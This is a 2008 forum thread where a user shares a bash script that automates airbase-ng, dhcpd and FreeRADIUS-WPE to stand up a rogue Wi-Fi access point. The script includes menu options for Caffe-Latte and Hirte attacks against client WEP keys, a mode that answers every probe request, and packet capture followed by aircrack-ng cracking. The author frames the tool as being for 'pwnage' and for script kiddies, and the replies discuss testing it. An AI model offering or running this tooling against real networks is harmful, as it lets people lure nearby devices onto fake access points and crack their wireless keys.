Timmo Posted December 4, 2008 Share Posted December 4, 2008 hi all. before anybody criticizes im not a big scripter and there are a lot of things i could have done with this to make it better and this is prob very buggy, hence im uploading it here. ok i have been playing around with airbase-ng lately (from aircrack-ng svn) also using dhcpd and freeradius. and i have started working on a script to make it easy to start the server for pwnage or just an access point. here it is and have a look. updated a little. please comment #!/bin/bash modprobe tun DUMPPATH="capture/airbase" debug=0 if [ "$debug" = "1" ]; then HOLD="-hold" else HOLD="" fi function killdaemons { . /etc/rc.d/init.d/functions RETVAL=0 echo -n "Shutting down dhcpd: " killproc dhcpd RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/dhcpd rm /var/state/dhcp/dhcpd.leases touch /var/state/dhcp/dhcpd.leases RETVAL=0 echo -n "Shutting down radiusd: " killproc /usr/local/sbin/radiusd RETVAL=$? echo [ $RETVAL -eq 0 ] rm /usr/local/var/log/radius/radius.log touch /usr/local/var/log/radius/radius.log RETVAL=0 echo -n "Shutting down airbase-ng: " killproc /usr/local/sbin/airbase-ng RETVAL=$? echo [ $RETVAL -eq 0 ] RETVAL=0 echo -n "Shutting down xterm: " killproc /usr/bin/xterm RETVAL=$? echo [ $RETVAL -eq 0 ] } function captureairodump { xterm $HOLD -title "Capturing data on channel: $CHANNEL" -e /usr/local/sbin/airodump-ng -w $DUMPPATH $CHANNEL$CAPWIFI } function airbasefunc { xterm $HOLD -title "running airbase-ng" -e $command } function dhcpfunc { ifconfig at0 192.168.0.1 netmask 255.255.255.0 echo -n "Starting dhcpd: " daemon /usr/sbin/dhcpd at0 RETVAL=$? echo [ $RETVAL -eq 0 ] && touch /var/lock/subsys/dhcpd xterm $HOLD -title "tail DHCP leases" -e tail -f /var/state/dhcp/dhcpd.leases } function radiusdfunc { /usr/local/sbin/radiusd -i 192.168.0.1 -p 1812 xterm $HOLD -title "tail radiusd log file" -e tail -f /usr/local/var/log/radius/radius.log & xterm $HOLD -title "tail radiusd other files" -e tail -f /usr/local/var/log/radius/freeradius-server-wpe.log } function aircrackfunc { xterm $HOLD -title "cracking wep key" -e /usr/local/bin/aircrack-ng $DUMPPATH*.cap } function setbasicAP { echo select adaptor select INTERFACE in $INTERFACES; do break; done echo Set BSSID. blank for adaptor address. example 00:01:02:03:44:55 read yz if [ "$yz" = "" ]; then BSSID="" else BSSID="-a $yz " fi echo Set channel [1] read yz if [ "$yz" = "" ]; then CHANNEL="-c 1 " else CHANNEL="-c $yz " fi echo Ad-Hoc mode y/[n] read yz if [ "$yz" = "y" ]; then ADHOC="-A " echo else ADHOC="" fi } function setESSID { echo set essid to use for AP read yz ESSID="--essid $yz " echo allow specific clients? y/[n] read yz if [ "$yz" = "y" ]; then echo "(f)ile or (s)pecified?" read yz if [ "$yz" = "f" ]; then echo enter path to file read xy MAC="--clients $xy " else echo enter MAC address read xy MAC="--client $xy " fi fi } function setfilterhack { echo "filter ESSIDs and/or MACs. 0=skip [1=allow] 2=disallow" read yz case $yz in 2 ) DISALLOW="-f disallow ";; 0 ) SKIP="1";; * ) DISALLOW="";; esac if [ "$SKIP" = "1" ]; then DISALLOW="" MAC="" ESSID="" else echo use MAC filtering? y/[n] read yz if [ "$yz" = "y" ]; then echo "(f)ile or (s)pecified?" read yz if [ "$yz" = "f" ]; then echo enter path to file read xy MAC="--clients $xy " else echo enter MAC address read xy MAC="--client $xy " fi fi echo use ESSID filtering? y/[n] read yz if [ "$yz" = "y" ]; then echo "(f)ile or (s)pecified?" read yz if [ "$yz" = "f" ]; then echo enter path to file read xy ESSID="--essids $xy " else echo enter ESSID read xy ESSID="--essid $xy " fi fi fi echo "respond to all probes? y/[n] (works with the filtering)" read yz if [ "$yz" = "y" ]; then ALLPROBES="-P -C 120 " else ALLPROBES="" fi } function hideessid { echo hide ESSID? y/[n] read yz if [ "$yz" = "y" ]; then ESSIDHIDE="-X " else ESSIDHIDE="" fi } function disablebroadcast { echo Disable responses to broadcast probes? y/[n] read yz if [ "$yz" = "y" ]; then Broadcast="-y " else Broadcast="" fi } function setencription { echo set encription echo use [0=None] 1=WEP 2=WPA1 3=WPA2 4=ALL read yz WepKey="" case $yz in 1 ) ENCRIPFLAG="-W 1 "; echo echo set wep key? [y]/n read xy if [ "$xy" = "n" ]; then WepKey="" echo else echo enter key read xy WepKey="-w $xy " echo fi;; 2 ) echo echo set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 read xy ENCRIPFLAG="-z $xy ";; 3 ) echo echo set mode 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 read xy ENCRIPFLAG="-Z $xy ";; 4 ) ENCRIPFLAG="-0 " echo echo set a wep key? [y]/n read xy echo if [ "$xy" = "n" ]; then WepKey="" else echo enter key read xy WepKey="-w $xy " fi;; * ) ENCRIPFLAG="";; esac echo echo fake EAPOL [0=Disable] 1=MD5 2=SHA1 3=auto read yz case $yz in 1 ) EAPOL="-V 1 " ;; 2 ) EAPOL="-V 2 " ;; 3 ) EAPOL="-V 3 " ;; * ) EAPOL="" ;; esac echo echo force shared key authentication? y/[n] read yz if [ "$yz" = "y" ]; then FORCESK="-s " echo set key length. default 128 read xy if [ "$xy" = "" ]; then SKKEYLENGTH="" else SKKEYLENGTH="-S $xy " fi else FORCESK="" SKKEYLENGTH="" fi } function attack { echo Select attack echo "0) dont attack, AP mode only. default" echo "1) use Caffe-Latte attack" echo "2) use cfrag (Hirate) attack" read yz case $yz in 1 ) ATTACK="-L " USEATTACK=1;; 2 ) ATTACK="-N " USEATTACK=1;; * ) ATTACK="" USEATTACK=0;; esac } function debugging { echo Print debugging info? [y]/n read yz if [ "$yz" = "n" ]; then Verbose="" else Verbose="-v " fi } killdaemons INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'` setbasicAP attack if [ "$USEATTACK" = "0" ]; then setESSID hideessid disablebroadcast setencription else setfilterhack hideessid disablebroadcast setencription fi debugging SWITCHES="$BSSID$CHANNEL$ADHOC$ENCRIPFLAG$WepKey$EAPOL$DISALLOW$MAC$ESSID$ALLPROBES$ESSIDHIDE$Broadcast$FORCESK$SKKEYLENGTH$ATTACK$Verbose$INTERFACE" command="/usr/local/sbin/airbase-ng $SWITCHES" echo echo $command echo run? [y]/n read yz if [ "$yz" = n ]; then exit; fi airbasefunc & sleep 1 echo if [ "$USEATTACK" = "1" ]; then echo use airodump to capture replies? y/[n] read captrue if [ "$captrue" = "y" ]; then echo remove old dump files? y/[n] read yz if [ "$yx" = "y" ]; then rm $DUMPPATH*;fi echo "select interface (can use the same interface)" select CAPWIFI in $INTERFACES; do break; done captureairodump & sleep 1 fi fi if [ "$captrue" = "y" ]; then echo run aircrack on captured packets? WEP only. y/[n] read yz if [ "$yz" = "y" ]; then aircrackfunc & sleep 1 fi fi echo echo use dhcp server? y/[n] read yz if [ "$yz" = "y" ]; then dhcpfunc & sleep 1 fi echo echo use radiusd? y/[n] read yz if [ "$yz" = "y" ]; then radiusdfunc & sleep 1 fi echo echo press enter to kill all read asdf killdaemons Quote Link to comment Share on other sites More sharing options...
blackriver Posted December 4, 2008 Share Posted December 4, 2008 Thanks for posting, looks good. I'll try this out on my way home. Quote Link to comment Share on other sites More sharing options...
loftrat Posted December 4, 2008 Share Posted December 4, 2008 Anything we can do about that nasty wide code box? Quote Link to comment Share on other sites More sharing options...
Timmo Posted December 4, 2008 Author Share Posted December 4, 2008 updated the script. now has different options for AP mode or attack mode. (makes it a little easyier to setup for a script kiddy hehe) oh and i tried to fix the long code box but couldnt find it in the short amount of time i have doing nothing at work :) Quote Link to comment Share on other sites More sharing options...
Timmo Posted December 15, 2008 Author Share Posted December 15, 2008 *bump* has anyone tested this yet? it seems to work on my backtrack system but people might want to try others. and i haven't been able to get the radius part to work. been testing many situations, shared key doesn't seem to want to work either (might have been a little impatient doing this test though) what are other peoples tests like? cant get anything to work with wpa1 or wpa2 but haven't had the chance to do a lot of testing here. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted December 17, 2008 Share Posted December 17, 2008 Just looking over the code it seems that ath0 is the hard coded network adapter, please correct me if wrong.. Maybe add an option to input your NIC, eth1 in my case.. I can edit it myself but for the skiddish it may be a bit more difficult.. Cant test it on this lappy but i will as soon as i get a chance. Quote Link to comment Share on other sites More sharing options...
Timmo Posted December 17, 2008 Author Share Posted December 17, 2008 After the functions have been declaired it kills the process's required (had issues with airbase-ng continuing to run after i closed out) then it comes up with a promt asking you to select your adapter. This was pulled out of the airoscript script that's on backtrack. (Will be noting this in the code later when I finish it completely) Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted December 17, 2008 Share Posted December 17, 2008 After the functions have been declaired it kills the process's required (had issues with airbase-ng continuing to run after i closed out) then it comes up with a promt asking you to select your adapter. This was pulled out of the airoscript script that's on backtrack. (Will be noting this in the code later when I finish it completely) Awesome. I use Mint as my main distro, i do alot of pentesting legally so BackTrack is really just a fun toy for me, so will it work across multiple distros(not just slax)? I am going to the local shope today to find an atheros card(some other fun things i want to try need this) and i will test it out then...broadcom + ndiswrapper = shit. Ive copied the py and will look over it in a few, but it seems you have the hard part out of the way. Are you going to make a gui for this as well? Asked because i saw a py/gui thread. Quote Link to comment Share on other sites More sharing options...
Timmo Posted December 18, 2008 Author Share Posted December 18, 2008 thats the idea. creating a gui for this and open up my skills to add more into the script kiddy community. (no good at actual programing but scripting i seem to get a grasp on) did have a bit of a look at free basic as i have done work in CBM basic and VB, but comileing issues on backtrack prevented me from using this. and the only reason i use backtrack is because i was building a really good pen test box using ubuntu 8 as the base but once the kernel was updated i thought had issues with the patched drivers i was using but turns out all drivers and chipsets except the intel one showed 0 power in airodump-ng. no good. tried linux minx, open suse all with the same error. then tried fedora compile issues so didnt even bother. the best bet atm is to stick with bt even though i dislike the kde desktop so much. i will start looking at gui creating over the next few weeks and hopefully put this into a gui during my time off work Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.